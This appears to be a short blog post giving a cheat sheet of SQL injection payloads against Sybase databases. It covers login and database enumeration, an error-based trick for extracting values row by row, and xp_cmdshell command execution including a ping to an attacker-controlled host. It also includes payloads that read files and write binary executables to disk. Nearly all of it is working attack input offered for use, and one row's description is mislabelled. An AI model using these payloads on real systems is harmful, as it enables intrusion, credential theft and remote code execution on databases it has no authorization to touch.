» Sybase
| Payload | Description (if any) |
| select @@version"– | View database version. |
| select name from master..syslogins"– | Misc. information disclosure |
| select name from master..sysdatabases"– | Misc. information disclosure |
| convert(integer,(select+min(name)+from+syslogins+where+name>'))– | Integer conversion “error” trick. |
| convert(integer,(select+min(name)+from+syslogins+where+name>'sybase'))– | An error will occur presenting the first value of the rowset (lets say its sybase). We then continue as before by placing the value into our query. An error will then present the next value in the rowset. We continue as before. |
| xp_cmdshell 'ipconfig+/all' | Misc. command execution with cp_cmdshell. |
| xp_cmdshell 'net+view' | Misc. command execution with cp_cmdshell. |
| xp_cmdshell 'net+users' | Misc. command execution with cp_cmdshell. |
| xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
| waitfor delay '0:0:5' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
| create proxy_table myfile external file at "c:\temp\file_to_read.txt" select * from myfile" | Reading files on the filesystem. |
| create table myfile (record varchar(2000)) external file at "c:\temp\myfile.exe" insert into myfile values(0xAND_YOUR_BINARY_DATA)" | Write file to filesystem. |
| str1 + str2 or n+n | Concat strings for blind SQL Injection tests. |
No Response to "Sybase"
Post a Comment